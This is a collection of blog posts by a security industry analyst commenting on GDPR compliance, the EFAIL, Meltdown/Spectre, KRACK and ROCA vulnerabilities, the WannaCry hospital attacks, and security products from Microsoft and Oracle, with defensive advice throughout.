Blog posts by Alexei Balaganski
It’s May 25 today, and the world hasn’t ended. Looking back at the last several weeks before the GDPR deadline, I have an oddly familiar feeling. It seems that many companies have treated it as another “Year 2000 disaster” - a largely imaginary but highly publicized issue that has to be addressed by everyone before a set date, and then it’s quickly forgotten because nothing has really happened.
Unfortunately, applying the same logic to GDPR is the biggest mistake a company can make. First of all, obviously, you can only be sure that all your previous preparations actually worked after they are tested in courts, and we all hope this happens to us as late as possible. Furthermore, GDPR compliance is not a one-time event, it’s a continuous process that will have to become an integral part of your business for years (along with other regulations that will inevitably follow). Most importantly, however, all the bad guys out there are definitely not planning to comply and will double their efforts in developing new ways to attack your infrastructure and steal your sensitive data.
In other words, it’s business as usual for cybersecurity specialists. You still need to keep up with the ever-changing cyberthreat landscape, react to new types of attacks, learn about the latest technologies and stay as agile and flexible as possible. The only difference is that the cost of your mistake will now be much higher. On the other hand, the chance that your management will give you a bigger budget for security products is also somewhat bigger, and you have to use this opportunity wisely.
As we all know, the cybersecurity market is booming, since companies are spending billions on it, but the net effect of this increased spending seems to be quite negligible – the number of data breaches or ransomware attacks is still going up. Is it a sign that many companies still view cybersecurity as a kind of a magic ritual, a cargo cult of sorts? Or is it caused by a major skills gap, as the world simply doesn’t have enough experts to battle cybercriminals efficiently?
It’s probably both and the key underlying factor here is the simple fact that in the age of Digital Transformation, cybersecurity can no longer be a problem of your IT department only. Every employee is now constantly exposed to security threats and humans, not computers, are now the weakest link in any security architecture. Unless everyone is actively involved, there will be no security anymore. Luckily, we already see the awareness of this fact growing steadily among developers, for example. The whole notion of DevSecOps is revolving around integrating security practices into all stages of software development and operations cycle.
However, that is by far not enough. As business people like your CFO, not administrators, are becoming the most privileged users in your company, you have to completely rethink substantial parts of your security architecture to address the fact that a single forged email can do more harm to your business than the most sophisticated zero-day exploit. Remember, the victim is doing all the work here, so no firewall or antivirus will stop this kind of attack!
To sum it all, a future-proof cybersecurity strategy in the “post-GDPR era” must, of course, be built upon a solid foundation of data protection and privacy by design. But that alone is not enough – only by constantly raising awareness of the newest cyberthreats among all employees and by gradually increasing the degree of intelligent automation of your daily security operations do you have a chance of staying compliant with the strictest regulations at all times.
Humans and robots fighting cybercrime together – what a time to be alive! :)
With mere days left till the dreaded General Data Protection Regulation comes into force, many companies, especially those not based in the EU, still haven’t quite figured out how to deal with it. As we mentioned countless times earlier, the upcoming GDPR will profoundly change the way companies collect, store and process personal data of any EU resident. What is understood as personal data and what is considered processing is very broad and is only considered legal if it meets a number of very strict criteria. Fines for non-compliance are massive – up to 20 million Euro or 4% of a company’s annual turnover, whichever is higher.
Needless to say, not many companies feel happy about massive investments they’d need to make into their IT infrastructures, as well as other costs (consulting, legal and even PR-related) of compliance. And while European businesses don’t really have any other options, quite a few companies based outside of the EU are considering pulling out of the European market completely. A number of them even made their decision public, although we could safely assume that most would rather keep the matters quiet.
However, before you even start looking for other similar solutions, consider one point: the GDPR protects the EU subjects’ privacy regardless of their geographic location. A German citizen staying in the US and using a US-based service is, at least in theory, supposed to have the same control over their PII as back home. And even without traveling, an IP blacklist can be easily circumvented using readily available tools like VPN. Trust me, Germans know how to use them – as until recently, the majority of YouTube videos were not available in Germany because of a copyright dispute, so a VPN was needed to enjoy “Gangnam style” or any other musical hit of the time.
On the other hand, thinking that the EU intends to track every tiniest privacy violation worldwide and then drag every offender to the court is ridiculous; just consider the huge resources the European bureaucrats would need to put into a campaign of that scale. In reality, their first targets will undoubtedly be the likes of Facebook and Google – large companies whose business is built upon collecting and reselling their users’ personal data to third parties. So, unless your business is in the same market as Cambridge Analytica, you should probably reconsider the idea of blocking out European visitors – after all, you’d miss nearly 750 million potential customers from the world’s largest economy.
Finally, the biggest mistake many companies make is to think that GDPR’s sole purpose is to somehow make their lives more miserable and to punish them with unnecessary fines. However, like any other compliance regulation, GDPR is above all a comprehensive set of IT security, data protection and legal best practices. Complying with GDPR - even if you don’t plan to do business in the EU market - is thus a great exercise that can prepare your business for some of the most difficult challenges of the Digital Age. Maybe in the same sense as a volcano eruption is a great test of your running skills, but running exercises are still quite useful even if you do not live in Hawaii.
As we all know, there is no better way for a security researcher to start a new week than to learn about another massive security vulnerability (or two!) that beats all previous ones and will surely ruin the IT industry forever! Even though I’m busy packing my suitcase and getting ready to head to our European Identity and Cloud Conference that starts tomorrow in Munich, I simply cannot but put my things aside for a moment and admire the latest one.
This time it’s about email encryption (or rather about its untimely demise). According to this EFF’s announcement, a group of researchers from German and Belgian universities has discovered a set of vulnerabilities affecting users of S/MIME and PGP – two most popular protocols for exchanging encrypted messages over email. In a chain of rather cryptic tweets, they’ve announced that they’ll be publishing these vulnerabilities tomorrow and that there is no reliable fix for the problems they’ve discovered. Apparently, the only way to avoid leaking your encrypted emails (even the ones sent in the past) to malicious third parties is to stop using these encryption tools completely.
Needless to say, this wasn’t the most elegant way to disclose such a serious vulnerability. Without concrete technical details, which we are promised not to see until tomorrow, pretty wild speculations are already making rounds in the press. Have a look at this article in Süddeutsche Zeitung, for example: „a research team… managed to shatter one of the central building blocks of secure communication in the digital age“. What do we do now? Are we all doomed?!
Well, first of all, let’s not speculate until we get exact information about the exploits and the products that are affected and not fixed yet. However, we could try to make a kind of an educated guess based on the bits of information we do have already. Apparently, the problem is not caused by a weakness in either protocol, but rather by the peculiar way modern email programs handle multipart mail messages (those are typically used for delivering HTML mails or messages with attachments). By carefully manipulating invisible parts of an encrypted message, an attacker may trick the recipient’s mail program to open an external link and thus leak certain information about encryption parameters. Since attacker has access to this URL, he can leverage this information to steal the recipient's private key or other sensitive data.
How to protect yourself from the exploit now? Well, the most obvious solution is not to use HTML format for sending encrypted mails. Of course, the practicality of this method in real life is debatable – you cannot force all of your correspondents to switch to plain text, especially the malicious ones. The next suggestion is to stop using encryption tools that are known to be affected (some are listed in the EFF’s article) until they are fixed. The most radical method, obviously, is to stop using email for secret communications completely and switch to a more modern alternative.
Will this vulnerability fundamentally change the way we use encrypted email in general? I seriously doubt it. Back in 2017, it was discovered that for months, Microsoft Outlook has been sending all encrypted mails with both encrypted and unencrypted forms of the original content included. Did anyone stop using S/MIME or decide to switch to PGP? Perhaps, the researchers who discovered that bug should have used more drama!
Yes, however negatively I usually think about this type of sensational journalism in IT, maybe it will have a certain positive effect if it makes more people to take notice and update their tools promptly. Or maybe it gives an additional incentive to software vendors to develop better, more reliable and convenient secure communication solutions.
Recently, Microsoft has announced general availability for another addition to their cybersecurity portfolio: Azure Advanced Threat Protection (Azure ATP for short) – a cloud-based service for monitoring and protecting hybrid IT infrastructures against targeted cyberattacks and malicious insider activities.
The technology behind this service is actually not new. Microsoft has acquired it back in 2014 with the purchase of Aorato, an Israel-based startup company specializing in hybrid cloud security solutions. Aorato’s behavior detection methodology, named Organizational Security Graph, enables non-intrusive collection of network traffic, event logs and other data sources in an enterprise network and then, using behavior analysis and machine learning algorithms, detects suspicious activities, security issues and cyber-attacks against corporate Active Directory servers.
Although this may sound like an overly specialized tool, in reality solutions like this can be a very useful addition to any company’s security infrastructure – after all, according to statistics, the vast majority of security breaches leverage compromised credentials, and close monitoring of the heart of nearly every company’s identity management – the Active Directory servers – allows for quicker identification of both known malicious attacks and traces of unknown but suspicious activities. And since practically every cyberattack involves manipulating stolen credentials at some stage of the killchain, identifying them early allows security experts to discover these attacks much earlier than the typical 99+ days.
Back in 2016, we have reviewed Microsoft Advanced Threat Analytics (ATA), the first product Microsoft released with the Security Graph technology. KuppingerCole’s verdict at the time was that the product was easy to deploy, transparent and non-intrusive, with an innovative and intuitive user interface, yet powerful enough to identify a wide range of security issues, malicious attacks and suspicious activities in corporate networks. However, the product was only intended for on-premises deployment and provided very limited forensic and mitigation capabilities due to lack of integration with other security tools.
Well, with the new solution, Microsoft has successfully addressed both of these challenges. Azure ATP, as evident from its name, is a cloud-based service. Although you obviously still need to deploy sensors within your network to capture the network traffic and other security events, they are sent directly to the Azure cloud, and all the correlation magic happens over there. This makes the product substantially more scalable and fitting even for the largest corporate networks. In addition, it can directly consume the latest threat intelligence data collected by Microsoft across its cloud infrastructure.
On top of that, Azure ATP integrates with Windows Defender ATP – Microsoft’s endpoint protection platform. If you’re using both platforms, you can seamlessly switch between them for additional forensic information or direct remediation of malware threats on managed endpoints. In fact, the company’s Advanced Threat Protection brand now also includes Office 365 ATP, which provides protection against malicious emails and URLs, as well as secures files in Office 365 applications.
With all three platforms combined, Microsoft can now offer seamless protection against malicious attacks across the most critical attack surfaces as a fully managed cloud-based solution.
When IT visionaries give presentations about the Digital Transformation, they usually talk about large enterprises with teams of experts working on exciting stuff like heterogeneous multi-cloud application architectures with blockchain-based identity assurance and real-time behavior analytics powered by deep learning (and many other marketing buzzwords). Of course, these companies can also afford investing substantial money into building in-depth security infrastructures to protect their sensitive data.
Unfortunately, for every such company there are probably thousands of smaller ones, which have neither budgets nor expertise of their larger counterparts. This means that these companies not only cannot afford “enterprise-grade” security products, they are often not even aware that such products exist or, for that matter, what problems they are facing without them. And yet, from the compliance perspective, these companies are just as responsible for protecting their customer’s personal information (or other kinds of regulated digital data) as the big ones and they are facing the same harsh punishments for GDPR violations.
One area where this is especially evident is database security. Databases are still the most widespread technology for storing business information across companies of all sizes. Modern enterprise relational databases are extremely sophisticated and complex products, requiring trained specialists for their setup and daily maintenance. The number of security risks a business-critical database is open to is surprisingly large, ranging from the sensitivity of the data stored in it all the way down to the application stack, storage, network and hardware. This is especially true for popular database vendors like Oracle, whose products can be found in every market vertical.
Of course, Oracle itself can readily provide a full range of database security solutions for their databases, but needless to say, not every customer can afford spending that much, not to mention having the necessary expertise to deploy and operate these tools. The recently announced Autonomous Database can solve many of those problems by completely taking management tasks away from DBAs, but it should be obvious that at least in the short term, this service isn’t a solution for every possible use case, so on-premises Oracle databases are not going anywhere anytime soon.
And exactly for these, the company has recently (and without much publicity) released their Database Security Assessment Tool (DBSAT) – a freeware tool for assessing the security configuration of Oracle databases and for identifying sensitive data in them. The tool is a completely standalone command-line program that does not have any external dependencies and can be installed and run on any DB server in minutes to generate two types of reports.
Database Security Assessment report provides a comprehensive overview of configuration parameters, identifying weaknesses, missing updates, improperly configured security technologies, excessive privileges and so on. For each discovered problem, the tool provides a short summary and risk score, as well as remediation suggestions and links to appropriate documentation. I had a chance to see a sample report and even with my quite limited DBA skills I was able to quickly identify the biggest risks and understand which concrete actions I’d need to perform to mitigate them.
The Sensitive Data Assessment report provides a different view on the database instance, showing the schemas, tables and columns that contain various types of sensitive information. The tool supports over 50 types of such data out of the box (including PII, financial and healthcare for several languages), but users can define their own search patterns using regular expressions. Personally, I find this report somewhat less informative, although it does its job as expected. If only for executive reporting, it would be useful not just to show how many occurrences of sensitive data were found, but to provide an overview of the overall company posture to give the CEO a few meaningful numbers as KPIs.
Of course, being a standalone tool, DBSAT does not support any integrations with other security assessment tools from Oracle, nor it provides any means for mass deployment across hundreds of databases. What it does provide is the option to export the reports into formats like CSV or JSON, which can be then exported into third party tools for further processing. Still, even in this rather simple form, the program helps a DBA to quickly identify and mitigate the biggest security risks in their databases, potentially saving the company from a breach or a major compliance violation. And as we all know, these are going to become very expensive soon.
Perhaps my biggest disappointment with the tools, however, has nothing to do with its functionality. Just like other companies before, Oracle seems to be not very keen on letting the world know about tools like this. And what use is even the best security tool or feature if people do not know of its existence? Have a look at AWS, for example, where misconfigured permissions for S3 buckets have been the reason behind a large number of embarrassing data leaks. And even though AWS now offers a number of measures to prevent them, we still keep reading about new personal data leaks every week.
Spreading the word and raising awareness about the security risks and free tools to mitigate them is, in my opinion, just as important as releasing those tools. So, I’m doing my part!
Looks like we the IT people have gotten more New Year presents than expected for 2018! The year has barely started, but we already have two massive security problems on our hands, vulnerabilities that dwarf anything discovered previously, even the notorious Heartbleed bug or the KRACK weakness in WiFi protocols. Discovered back in early 2017 by several independent groups of researchers, these vulnerabilities were understandably kept from the general public to give hardware and operating system vendors time to analyze the effects and develop countermeasures for them and to prevent hackers from creating zero-day exploits.
Unfortunately, the number of patches recently made for the Linux kernel alone was enough to raise suspicion of many security experts. This has led to a wave of speculations about the possible reasons behind them: has it something to do with the NSA? Will it make all computers in the world run 30% slower? Why is Intel’s CEO selling his stock? In the end, the researchers were forced to release their findings a week earlier just to put an end to wild rumors. So, what is this all about after all?
Technically speaking, both Meltdown and Spectre aren’t caused by some bugs or vulnerabilities. Rather, both exploit the unforeseen side effects of speculative execution, a core feature present in most modern processors that’s used to significantly improve calculation performance. The idea behind speculative execution is actually quite simple: every time a processor must check a condition in order to decide which part of code to run, instead of waiting till some data is loaded from memory (which may take hundreds of CPU cycles to complete), it makes an educated guess and starts executing the next instruction immediately. If later the guess proves to be wrong, the processor simply discards those instructions and reverts its state to a previously saved checkpoint, but if it was correct, the resulting performance gain can be significant. Processors have been designed this way for over 20 years, and potential security implications of incorrect speculative execution were never considered important.
Well, not any more. Researchers have discovered multiple methods of exploiting side effects of speculative execution that allow malicious programs to steal sensitive data they normally should not have access to. And since the root cause of the problem lies in the fundamental design in a wide range of modern Intel, AMD and ARM processors, nearly every system using those chips is affected including desktops, laptops, servers, virtual machines and cloud services. There is also no way to detect or block attacks using these exploits with an antivirus or any other software.
The only way to fully mitigate all variants of the Spectre exploit is to modify every program explicitly to disable speculative execution in sensitive places. There is some consolation in the fact that exploiting this vulnerability is quite complicated and there is no way to affect the operating system kernel this way. This cannot be said about the Meltdown vulnerability, however.
Apparently, Intel processors take so many liberties when applying performance optimizations to the executed code that the same root cause gives hackers access to arbitrary system memory locations, rendering (“melting”) all memory isolation features in modern operating systems completely useless. When running on an Intel processor, a malicious code can leak sensitive data from any process or OS kernel. In a virtualized environment, a guest process can leak data from the host operating system. Needless to say, this scenario is especially catastrophic for cloud service providers, where data sovereignty is not just a technical requirement, but a key legal and compliance foundation for their business model.
Luckily, there is a method of mitigating the Meltdown vulnerability completely on an operating system level, and that is exactly what Microsoft, Apple and Linux Foundation have been working on in the recent months. Unfortunately, to enforce separation between kernel and user space memory also means to undo performance optimizations processors and OS kernels are relying on to make switching between different execution modes quicker. According to independent tests, for different applications these losses may be anywhere between 5 and 30%. Again, this may be unnoticeable to average office users, but can be dramatic for cloud environments, where computing resources are billed by execution time. How would you like to have your monthly bill suddenly increased by 30% for… nothing, really.
Unfortunately, there is no other way to deal with this problem. The first and most important recommendation is as usual: keep your systems up-to-date with the latest patches. Update your browsers. Update your development tools. Check the advisories published by your cloud service provider. Plan your mitigation measures strategically.
And keep a cool head – conspiracy theories are fun, but not productive in any way. And by the way: Intel officially states that their CEO selling stocks in October has nothing to do with this vulnerability.
Recently, I have attended the Oracle OpenWorld in San Francisco. For five days, the company has spared no expenses to inform, educate and (last but not least) entertain its customers and partners as well as developers, journalists, industry analysts and other visitors – in total, a crowd of over 50 thousand. As a person somewhat involved in organizing IT conferences (on a much smaller scale, of course), I could not but stand in awe thinking about all the challenges organizers of such an event had to overcome to make it successful and safe.
More important, however, was the almost unexpected thematic twist that dominated the whole conference. As I was preparing for the event, browsing the agenda and the list of exhibitors, I found way too many topics and products quite outside of my area of coverage. Although I do have some database administrator (DBA) experience, my current interests lie squarely within the realm of cybersecurity and I wasn’t expecting to hear a lot about it. Well, I could not be more wrong! In the end, cybersecurity was definitely one of the most prominent topics, starting right with Larry Ellison’s opening keynote.
The Autonomous Database, the world’s first database, according to Oracle, that comes with fully automated management, was the first and the biggest announcement. Built upon the latest Oracle Database 18c, this solution promises to completely eliminate human labor and hence human error thanks to complete automation powered by machine learning. This includes automated upgrades and patches, disaster recovery, performance tuning and more. In fact, an autonomous database does not have any controls available for a human administrator – it just works™. Of course, it does not replace all the functions of a DBA: a database specialist can now focus on more interesting, business-related aspects of his job and leave the plumbing maintenance to a machine.
The offer comes with a quite unique SLA that guarantees 99.995% availability without any exceptions. And, thanks to more elastic scalability and optimized performance, “it’s cheaper than AWS” as we were told at least a dozen times during the keynote. For me however, the security implications of this offer are extremely important. Since the database is no longer directly accessible to administrators, this not only dramatically improves its stability and resilience against human errors, but also substantially reduces the potential cyberattack surface and simplifies compliance with data protection regulations. This does not fully eliminate the need for database security solutions, but at least simplifies the task quite a bit without any additional costs.
Needless to say, this announcement has caused quite a stir among database professionals: does it mean that a DBA is now completely replaced by an AI? Should thousands of IT specialists around the world fear for their jobs? Well, the reality is a bit more complicated: the Autonomous Database is not really a product, but a managed service combining the newest improvements in the latest Oracle Database release with the decade-long evolution of various automation technologies, running on the next generation of Oracle Exadata hardware platform supported by the expertise of Oracle’s leading engineers. In short, you can only get all the benefits of this new solution when you become an Oracle Cloud customer.
This is, of course, a logical continuation of Oracle’s ongoing struggle to position itself as a Cloud company. Although the company already has an impressive portfolio of cloud-based enterprise applications and it continues to invest a lot in expanding their SaaS footprint, when it comes to PaaS and IaaS, Oracle still cannot really compete with its rivals that started in this business years earlier. So, instead of trying to beat competitors on their traditional playing fields, Oracle is now focusing on offering unique and innovative solutions that other cloud service providers simply do not have (and in the database market probably never will).
Another security-related announcement was the unveiling of the Oracle Security Monitoring and Analytics – a cloud-based solution that enables detection, investigation and remediation of various security threats across on-premises and cloud assets. Built upon the Oracle Management Cloud platform, this new service is also focusing on solving the skills gap problem in cybersecurity by reducing administration burden and improving efficiency of cybersecurity analysts.
Among other notable announcements are various services based on applied AI technologies like intelligent conversation bots and the newly launched enterprise-focused Blockchain Cloud Service based on the popular Hyperledger Fabric project. These offerings, combined with the latest rapid application development tools unveiled during the event as well, will certainly make the Oracle Cloud Platform more attractive not just for existing Oracle customers, but for newcomers of all sizes – from small startups with innovative ideas to large enterprises struggling to make their transition to the cloud as smooth as possible.
For anyone working in IT security, this week surely did not start well. Not one, but two major cryptography-related vulnerabilities have been disclosed, and each of them is at least as massive in scale and potential consequences as the notorious Heartbleed incident from 2014.
First, a Belgian researcher Mathy Vanhoef from the University of Leuven has published the details of several critical weaknesses discovered in WPA2 – the de-facto standard protocol used for securing modern Wi-Fi networks. By exploiting these weaknesses, an attacker can launch so-called key reinstallation attacks (hence the name KRACK, and we’ve discussed the importance of catchy names for vulnerabilities before) and eventually decrypt any sensitive data transmitted over a supposedly secured wireless channel.
As opposed to Heartbleed, however, the vulnerability is not found in a particular library or a product – it’s caused by an ambiguity in the definition of the WPA2 protocol itself, so any operating system or library that implements it correctly is still vulnerable. Thus, all desktop and mobile operating systems were affected by this attack, as well as numerous embedded and IoT devices with built-in Wi-Fi capabilities. Somewhat luckily, this protocol weakness can be fixed in a backwards-compatible manner, so we do not have to urgently switch to WPA3 (and by no means you should switch to WEP or any other even less secure connection method in your wireless network). However, there is no other way to mitigate the problem without patching each client device. Changing the Wi-Fi password, for example, won’t help.
Of course, quite a few vendors have already released updates (including Microsoft), but how long will it take for everyone to apply these? And what about huge numbers of legacy products which will never be patched? The only way to secure them properly is to disable Wi-Fi and basically repurpose them as expensive paperweights. For desktop and mobile users, using HTTPS-only websites or encrypted VPN tunnels for accessing sensitive resources is recommended, just like for any other untrusted network, wireless or not. In general, one should slowly get used to the notion of treating every network as untrusted, even their own home Wi-Fi.
The second vulnerability revealed just recently is of a different nature, but already classified as even more devastating by many experts. The ROCA (Return of the Coppersmith’s Attack) vulnerability is an implementation flaw discovered by an international team of British, Czech and Italian researchers in a cryptographic library used in security chips produced by Infineon Technology. This flaw essentially means that RSA encryption keys generated using these chips are not cryptographically strong and are much easier to crack.
In theory, this problem should not be as widespread as the KRACK vulnerability, but in reality, it affects numerous security products from such vendors as Microsoft, Google, HP or Lenovo and existing RSA keys dating as far back as 2012 can be vulnerable. Also, since public key cryptography is so widely used in IT – from network encryption to signing application code to digital signatures in eGovernment projects – this opens a broad range of potential exploits: spreading malware, preforming identity theft or bypassing Trusted Platform Modules to run malicious code in secure environments.
What can we do to minimize the damage of this vulnerability? Again, it’s first and foremost about checking for available security updates and applying them in timely manner. Secondly, all potentially affected keys must be replaced (nobody should be using 1024-bit RSA keys in 2017 anyway).
And, of course, we always have be ready for new announcements. The week has only just begun, after all!
I’ve been working in IT my whole life and since I’ve joined KuppingerCole over ten years ago, cybersecurity has been my job. Needless to say, I like my job: even though we industry analysts are not directly involved in forensic investigations or cyberthreat mitigation, being up-to-date with the latest technological developments and sharing our expertise with both end users and security vendors is our daily life, which is always challenging and exciting at the same time.
However, occasionally I am having doubts about my career choice. Does everything I do even matter? Cybersecurity market is booming, predicted to reach nearly 250 billion USD within the next 5 years. However, do we notice any downward trend in the number of security breaches or financial losses due to cyberattacks? Not really…
Last time I was having these thoughts back in May after the notorious Wannacry incident: just as hundreds of top experts were discussing the most highbrowed cybersecurity problems at our European Identity and Cloud Conference, a primitive piece of malware exploiting a long-fixed problem in Windows operating system has disrupted hundreds of thousands computers around the world, affecting organizations from public hospitals to international telecom providers. How could this even have happened? All right, those poor underfunded and understaffed British hospitals at least have an (still questionable) excuse for not being able to maintain the most basic cybersecurity hygiene principles within their IT departments. But what excuse do large enterprises have for letting their users open phishing emails and not having proper backups of their servers?
“But users do not care about their security or privacy,” people say. This can’t be further from truth though! People care about not being killed very much, so they arm themselves with guns. People care about their finances, so they do not keep their money under mattresses. And people surely care about their privacy, so they buy curtains and lock their doors. However, many people still do not realize that having an antivirus on their mobile phone is just as important for their financial stability and sometimes even physical safety as having a gun on their night table. And even those who are already aware of that, are often sold security products like some kind of magical amulets that are supposed to solve their problems without any effort. But should users really be blamed for that?
With enterprises, the situation is often even worse. Apparently, a substantial percentage of security products purchased by companies never even gets deployed at all. And more often than not, even those that get deployed, will be actively sabotaged by users who see them as a nuisance hindering their business productivity. Add the “shadow IT” problem into the mix, and you’ll realize that many companies that spend millions on cybersecurity are not really getting any substantial return of their investments. This is a classical example of a cargo cult. Sometimes, after reading about another large-scale security breach I cannot completely suppress a mental image of a firewall made out of a cardboard box or a wooden backup appliance not connected to anything.
However, the exact reason for my today’s rant is somewhat different and, in my opinion, even more troubling. While reading the documentation for a security-related product of one reputable vendor, I’ve realized that it uses an external MySQL database to store its configuration. That got me thinking: a security product is sold with a promise to add a layer of protection around an existing business application with known vulnerabilities. However, this security product itself relies on another application with known vulnerabilities (MySQL isn’t exactly known for its security) to fulfill its basic functions. Is the resulting architecture even a tiny bit more secure? Not at all – due to added complexity it’s in fact even more open to malicious attacks.
Unfortunately, this approach towards secure software design is very common. The notorious Heartbleed vulnerability of the OpenSSL cryptographic library has affected millions of systems around the world back in 2014, and three years later at least 200.000 still have not been patched. Of course, software vendors have their reasons for not investing into security of their products: after all, just like any other business, they are struggling to bring their products to the market as quickly as possible, and often they have neither budgets nor enough qualified specialists to design a properly secured one.
Nowadays, this problem is especially evident in consumer IoT products, and this definitely needs a whole separate blog post to cover. However, security vendors not making their products sufficiently secure pose an even greater danger: as I mentioned earlier, for many individuals and organizations, a cybersecurity product is a modern equivalent of a safe. Or an armored car. Or an insulin pump. How can we trust a security product that in fact is about as reliable as a safe with plywood walls?
Well, if you’ve read my past blog posts, you probably know that I’m a strong proponent of government regulation of cybersecurity. I know that this idea isn’t exactly popular among software vendors, but is there really a viable alternative? After all, gunsmiths or medical equipment manufacturers have been under strict government control for ages, and even security guards and private investigators must obtain licenses first. Why not security vendors? For modern digital businesses, the reliability of cybersecurity products is at least as important as pick resistance of their door locks.
Unfortunately, this kind of government regulation isn’t probably going to happen anytime soon, so companies looking for security solutions are still stuck with the “Caveat Emptor” principle. Without enough own experience to judge whether a particular product is really capable of fulfilling its declared functionality, one, of course, should turn to an independent third party for a qualified advice. For example, to an analyst house like us :)
However, the next most useful thing to look for is probably certification according to government or industry standards. For example, when choosing an encryption solution, it’s wise to look for a FIPS 140-2 certification with level 2 or higher. There are appropriate security certifications for cloud service providers, financial institutions, industrial networks, etc.
In any case, do not take any vendor’s claims for granted. Ask for details regarding the architecture of their products, which security standards they implement or whether they rely on open source libraries or third-party products. The more pressure about secure design you put on vendors, the higher are the chances that in the future, they will see security by design as their unique selling proposition and not a waste of resources. And as always, when you don’t know where to start, just ask an expert!
Just as we have returned from our annual European Identity and Cloud Conference, where we’ve spent four days talking about cybersecurity, identity management and privacy protection with top experts from around the world, we faced the news from Great Britain, where the latest large-scale ransomware attack has nearly shut down IT systems in at least 16 hospitals. Medical workers have been completely locked out of their computers. Patient records, test results, blood banks were no longer available. Critical patients had been rushed to other hospitals for emergency surgeries, while doctors had to switch back to pen and paper to carry on their duties.
How could all this even happen? Sure, the media often present ransomware as some kind of a diabolically complex work of elite hacker groups, but in reality this is one of the least technologically advanced kinds of malware, barely more sophisticated that the proverbial Albanian virus. Typically, ransomware is spread via massive phishing campaigns, luring unsuspecting users to click an attachment and then let the malware exploit a known vulnerability to infect their computers. Finally, ransomware holds the victim’s computer hostage by encrypting their important files or locking access to the whole system, demanding a payment to restore it.
This kind of malware is nowhere new, with a first prototype developed over 20 years ago, but only recently, as the number of computers connected to the Internet has grown exponentially along with availability of online payment services, has it become a profitable business for cybercriminals. After all, there is no need to spend weeks planning a covert targeted attack or developing evasion technologies – one can easily utilize readily available spam networks and vulnerability exploits to start collecting bitcoins or even iTunes gift cards from poor home users mourning the loss of their vacation photos.
In the last couple of years, we’ve learned about several major ransomware types like CryptoLocker or CryptoWall, which have managed to collect millions of dollars in ransom before they were finally taken down by the authorities. Unfortunately, new strains constantly appear to evade antivirus detection and to target various groups of victims around the world. The WannaCry ransomware that affected the hospitals in Britain wasn’t in fact targeting the NHS specifically – within just a few hours after being initially identified, it has already spread around the world, affecting targets in nearly 100 countries including large telecommunications companies in Spain or government agencies in Russia.
Personally, I find it hard to believe that this was the original intention of the people behind this malware campaign. Rather, it looks like “a job done too well”, which led to the uncontrolled spread far beyond what was initially planned. A notable fact about this ransomware strain, however, is that it uses a particular vulnerability in Microsoft Windows that has been weaponized by the NSA and which became public in April after a leak by the Shadow Brokers group.
Although this exploit has been patched by Microsoft even before the leak, a huge number of computers around the world have not yet been updated. This, of course, includes the British hospitals, which still largely utilize extremely outdated computers running Windows XP. Without the budgets needed to upgrade and maintain their IT systems, without properly staffed IT departments and, last but not least, without properly educating the users, the whole IT infrastructure at the NHS was basically a huge ticking bomb, which finally went off today.
So, what can we do to avoid being hit by a ransomware like this? It is worth stressing again that resilience against ransomware attacks is a matter of the most basic “cybersecurity hygiene” practices. My colleague John Tolbert has outlined them in one of his blog posts a month ago. We are planning to publish additional reports on this topic in the near future, including a Leadership Compass on antimalware and endpoint security solutions, so watch this space for new announcements.
There is really nothing complicated about maintaining proper backups and not clicking on attachments in phishing mails, so if an organization was affected by ransomware, this is a strong indicator that its problems lie beyond the realm of technology. For several years, we’ve been talking about the similar divide in the approaches towards cybersecurity between IT and OT. However, where OT experts at least have their reasons for neglecting IT security in favor of safety and process continuity, the glaring disregard for the most basic security best practices in many public-sector institutions can only be attributed to insufficient funding and thus a massive lack of qualified personnel, which is needed not just to operate and secure IT infrastructures, but to continuously educate the users about the latest types of cyberthreats. Unfortunately, the recent cuts in NHS funding do not promise any positive changes for British hospitals.
There is the legal aspect of the problem as well. Whereas oil rigs, nuclear power plants or water supplies are rightfully classified as critical infrastructures, with special government programs created to protect them, hospitals are somehow not yet seen as critical, although many lives obviously depend on them. If an attack on a power plant can be rightfully considered an act of terrorism, why disrupting critical medical services still isn’t?
Quite frankly, I very much hope that, regardless of what the motives of the people behind this ransomware were, cybersecurity experts and international law enforcement agencies team up to find them as quickly as possible and come down on them like a ton of bricks if just for the sake of sending a final warning to other cybercriminals. Because if they don’t, we can only brace ourselves for more catastrophes in the future.
Register now for KuppingerCole Select and get your free 30-day access to a great selection of KuppingerCole research materials and to live trainings.
Whether public, private or hybrid clouds, whether SaaS, IaaS or PaaS: All these cloud computing approaches are differing in particular with respect to the question, whether the processing sites/parties can be determined or not, and whether the user has influence on the geographical, qualitative and infrastructural conditions of the services provided. Therefore, it is difficult to meet all compliance requirements, particularly within the fields of data protection and data security. The decisive factors are transparency, controllability and influenceability of the service provider and his [...]